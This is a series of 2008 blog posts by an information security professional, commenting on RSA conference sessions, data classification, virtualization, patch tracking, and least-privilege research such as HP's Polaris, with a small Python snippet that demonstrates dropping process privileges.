This week I'm participating in an (ISC)2 workshop for item writing and review for the ISSAP certification. This opportunity gave me a very good view of how the exams are created and managed. Honestly, what I have seen so far has completely changed the way I see these certifications. The process is thorough and the questions pass through review by several very good professionals. I know that passing a test, even one with good questions, is not proof of professional competency, but it's a good way to assess the basic knowledge of a candidate. Congratulations to (ISC)2!

Wednesday, April 30, 2008

Virtualization - there is also a good security aspect

I was reading this article from NetworkWorld about "Virtual Server Sprawl" and the problems it causes for security. Well, while I agree with the point of view presented there, I also think that the ease of deploying a new server brought by virtualization can help us control an old security problem: servers with too many functions. Lots of people have already said that VMs should be grouped by their sensitivity levels, and I agree with that. If organizations use virtualization to improve the segregation of duties among servers and keep the grouping concept, it will certainly help improve network security. It was always sad for me to see those Web+DNS+SMTP servers. Now they can be kept on a single piece of hardware, but with stronger isolation through virtualization.

Thursday, April 24, 2008

Finally someone said it!

I was extremely happy to read this post from Richard Mogull, where he says:

"Data Classification Is Dead

I know what’s running through your head right now. “WTF?!? Mogull’s totally lost it. Isn’t he that data/information-centric security dude?” Yes I am (the info-centric guy, not the insane bit), and here’s the thing: The concept that you can run around, analyze, and tag your data throughout the enterprise, then keep it current through changing business contexts and requirements, is totally ridiculous. Sure, we have tools today that can scan our environment and, based on policies, tag files, but that just applies a static classification in a dynamic environment. I have yet to talk with a customer that really does enterprise-wide data classification successfully except for a few, discrete bits of data (like credit card numbers). Truth is that’s data identification not data classification. Enterprise content is just too volatile for static tags to really represent it’s value."

A few years ago I was advocating the same thing during a discussion with some friends, complaining about how pointless current data classification policies and procedures are when we think about the current state of applications, data sharing and web 2.0. I just don't believe that information classification can happen in a dynamic organization the way it is taught in, let's say, a CISSP prep class. We really need to think outside the box when dealing with the challenge of prioritizing security measures according to the value of information.

I'll quote Richard again on data classification: "That, my friend, is not only dead, it was never really alive."

Wednesday, April 23, 2008

The new security guy

Alan Shimel has blogged about a very common situation: the one where a networking (or anything else) guy becomes the new security guy. I've lost count of how many times I've seen that! The problem is, it's not only common, it's also impressive how many of these guys believe they know everything about security from the moment they receive the new job title. I worked in a big security team where almost nobody was a security professional; they just ended up "falling" into the security department. It was a huge nightmare to make them understand that they didn't know the basic concepts and that some things had to change. Until people understand that our job isn't something like a new device you just learn how to set up, we will keep seeing these cases and their results: breaches, breaches, breaches.

Friday, April 18, 2008

Isn't it an interesting case for business continuity studies?

I was reading about the strike of the federal customs auditors here in Brazil. They are not inspecting cargo coming through the ports, so the arriving containers can't be unloaded. OK, it shouldn't be a problem for exporting goods, as the problem is with imported goods, right? Not necessarily. The strike is causing problems for exports too, as not only are the storage areas at the ports full, but there is now also a lack of empty containers! Isn't it an interesting case for business continuity studies?

Thursday, April 17, 2008

Windows Server 2008 - Server Core

I really love the concept of Windows Server Core - an installation that includes only the minimal components needed to make Windows work as a server - that Microsoft will include in Windows Server 2008. The advantage is obvious: a reduced attack surface. However, I just found an interesting piece of data: someone looked into information from past security bulletins and noticed that of 25 past bulletins only 4 would apply to Server Core. Quite interesting, isn't it? So follow the tip from this post and go ask your software provider if their product will work on a Server Core installation.

Have you tried Secunia PSI?

In times when we are talking about flaws in Adobe Flash, Apple QuickTime and so many others, it's good to ask what we are doing to ensure that we are not running software with known vulnerabilities. Last August I blogged about Secunia PSI. I've been using it since then and it's impressive how hard it is to stay up to date with all the software running on our workstations. The scanning process is a bit resource intensive, so I chose to run it periodically (once a week) instead of keeping it always running. Today I ran PSI and it found some things that needed to be updated. Some of them were expected (Adobe Flash) and others I was not aware of, such as VMware Server, VLC Player and 7-Zip. This is a good example of how easy it is to have vulnerable software running on our computers. PSI does a very good job of detecting software that needs to be updated, so I recommend it to everyone. If you are not using anything to keep track of software updates, try PSI. You will be surprised.

Adobe is the next target - does anyone still doubt?

A few days ago a new Adobe Flash vulnerability was found (in a very interesting piece of work, I must say). I have blogged about my concerns with ubiquitous software, like Flash players. We have been seeing the dangers of security vulnerabilities in this kind of software for years, beginning with Microsoft. Now that Microsoft is doing a good job of closing (and avoiding new) gaps, attackers are taking the logical approach and changing targets to software that is as ubiquitous as Microsoft's. Adobe (Acrobat, Flash, now AIR) and Apple (QuickTime and iTunes) would be the next targets, and this is being confirmed. I heard at RSA that Adobe has a good security posture as a company (Dan Kaminsky mentioned during his presentation that Adobe acted very proactively and quickly on a vulnerability he found), but I still haven't seen the same posture from Apple. Do we need to wait for an "iTunes worm" before Apple starts to take this matter seriously?

Polaris - A very interesting research piece from HP

Mr. Alan Karp mentioned this piece of research from HP Labs during an RSA session: "Polaris is a package for Windows XP that demonstrates that we can do better at dealing with viruses than has been done so far. Polaris allows users to configure most applications so that they launch with only the rights they need to do the job the user wants done. This simple step, enforcing the Principle of Least Authority (POLA), gives so much protection from viruses that there is no need to pop up security dialog boxes or ask users to accept digital certificates. Further, there is little danger in launching email attachments, using macros in documents, or allowing scripting while browsing the web. Polaris demonstrates that we can build systems that are more secure, more functional, and easier to use." The paper is quite simple and easy to understand, but it gives us some very important lessons. If Microsoft had tried a similar approach in Vista, UAC might have been better accepted by users. This kind of research should be the core of security innovation. Instead of trying to build "Anti-X" and "Anti-Y" stuff, we should concentrate on reviewing things that are badly designed and that can be fixed in an elegant way, as Polaris does.
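
Polaris does this with restricted Windows accounts, if I recall the paper correctly, but the underlying POLA idea is easy to demonstrate. The snippet below is just a Unix-flavored toy of mine, not Polaris: the viewer command, the file path and the use of the "nobody" account are assumptions, and it must be started with enough privilege to change uid/gid.

import os
import pwd
import subprocess

def drop_privileges():
    # Run the child with almost no authority: no extra groups, unprivileged uid/gid.
    nobody = pwd.getpwnam("nobody")
    os.setgroups([])
    os.setgid(nobody.pw_gid)
    os.setuid(nobody.pw_uid)

# Launch a document viewer with only the rights it needs; a malicious document
# exploiting it cannot touch the real user's files.
subprocess.run(["evince", "/tmp/untrusted.pdf"], preexec_fn=drop_privileges)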

CyberStorm II and languages

The panel about the CyberStorm II exercise at RSA wasn't very good in terms of content (in fact, it was terrible), but one thing caught my attention. There were other countries participating in the exercise: Australia, Canada, New Zealand and the UK. Did you notice that only English-speaking countries participated? Last year I saw Mr. Mike Reakey, from Microsoft, showing the kind of communication that their Response Center receives. That includes messages entirely written in different Unicode character sets. Now, if this is a challenge for the Microsoft Security Response Center, can you imagine the problem that the language barrier would be in a worldwide cyber crisis? I think the next CyberStorm exercise should include countries with different languages, to assess the impact this can have on incident response and communication procedures. I'm certain it will be bigger than expected.

Some good quotes from RSA

I took note of some interesting comments during RSA sessions. The most interesting are from the "Groundhog Day" panel. I was planning to write a post with comments and thoughts about each one, but I'm too tired and busy, and RSA is already becoming old news. So I think a quick list of quotes will be enough:

"Accept that behavior won't change" - Richard Mogull

"Accept that vulnerabilities will exist" - Richard Mogull

"Auditors don't understand security" - David Mortman

(not verbatim, I didn't take the exact words): You need to talk to the business, but don't go there asking "how can I help you?"; say something. - Mike Rothman

Tuesday, April 15, 2008

How many companies are looking into Security as a Marketing feature?

This question was asked by Martin McKeay during a panel at RSA (Avoiding the "Security Groundhog Day", hosted by Mike Rothman). I took note at that moment because the answer came to me immediately: half of the companies are not doing that because their customers don't ask for it. The other half uses security as a marketing feature, but only as that, i.e., they claim their products/services are secure when they are not, and consumers don't know how to verify those claims. A good example is those "Hacker Proof" seals hosted by some online stores. Everyone who has ever performed a security assessment of an e-commerce environment knows that a vulnerability scan (all you need to get one of those seals) is not enough to say that a website is "hacker proof". The question is how to educate consumers to identify which companies really protect their data. Or, are consumers really worried about that at all?

From a RSA vendor leaflet

I'm looking at some leaflets that I got from vendors at the RSA Expo. I've just caught this on one of them: "included signature-based anomaly detection capabilities". WTF is that?!?! Can anyone explain to me what "signature-based anomaly detection" is?

RSA, final post

Writing this while waiting to board my return flight to Sao Paulo. It’s good to write after a few hours away from the conference, as it gives me a better view of what really impressed me most. I agree with other bloggers who mentioned the lack of innovation this year. However, it was expected.

I think I can mention some highlights. Black Ops, Sins of Our Fathers, Avoiding the “Security Groundhog Day”, the DLP Panel and Ajax Security were very good in terms of presentation and discussion, but honestly, nothing new came from them.

The best sessions for me were Bruce Schneier’s and Malcolm Gladwell’s. Both talked about human perception and the way we think. Schneier has already published some things about it, especially about the way we perceive risk. Gladwell’s presentation was very interesting even though it wasn’t related to security at all. He talked about decision making, not common decisions, but those made unconsciously. I think there are lots of situations in security that can benefit from his theories. The way we assemble and run security monitoring centers, for instance, could be radically changed. Reading his book (“Blink: The Power of Thinking Without Thinking”, which I bought at the airport), I realized that we may be making some basic mistakes, like providing too much information to those who need to make decisions. It would be nice to do some research with good SOC operators to see how they usually identify an attack and what information they use, and whether the “thin slicing” approach that Gladwell explains in his book applies there. If anything provided food for thought during the conference, I think it was that.

The exposition was kind of sad. Tons of “appliances” providing solutions to problems defined by the vendors themselves. Lots of vendors talking about how their products provide very nice reports, but what about detection, prevention? Can all the problems in security be solved by a nice report with some pie charts?

The networking aspect, on the other hand, was terrific. I met lots of people who write very good blogs, and found out that some of them are reading mine. I hope to be able to attend the conference in the coming years to maintain all those contacts. Thumbs up to Martin McKeay, Jennifer Leggio and Alan Shimel for organizing the bloggers meetup. It was very good and an extraordinary opportunity to chat with people I respect a lot. Thanks!

Thursday, April 10, 2008

RSA post number 2

This second day of RSA was quite interesting. Not exactly because of the presentations; almost everything I saw today was very shallow and nothing new. I can mention an honorable exception, "Sins of Our Fathers", with Daniel Houser, Hugh Thompson and Benjamin Jun. Good speakers and good (although not new) content. The best part of the day was definitely the bloggers meetup. It was very nice to talk to people I only knew from their blogs, like Jennifer Jabbusch, Chris Hoff, Richard Mogull, Martin McKeay, Mike Rothman and even Bruce Schneier. I had the opportunity to talk to Bruce for a few moments about his RSA presentation, and was pleased to find that he agrees that the source of the security theater we are seeing in new solutions is the fact that buyers are not providing their model to vendors; they are asking the vendors for models. Unfortunately, he had to leave the meeting early. It would be nice to know what he thinks should be done to help buyers provide their own models to vendors instead of asking for one. There are some more interesting talks tomorrow. Let's see if some innovation appears or if RSA 2008 will be remembered just as "a nice event without anything new".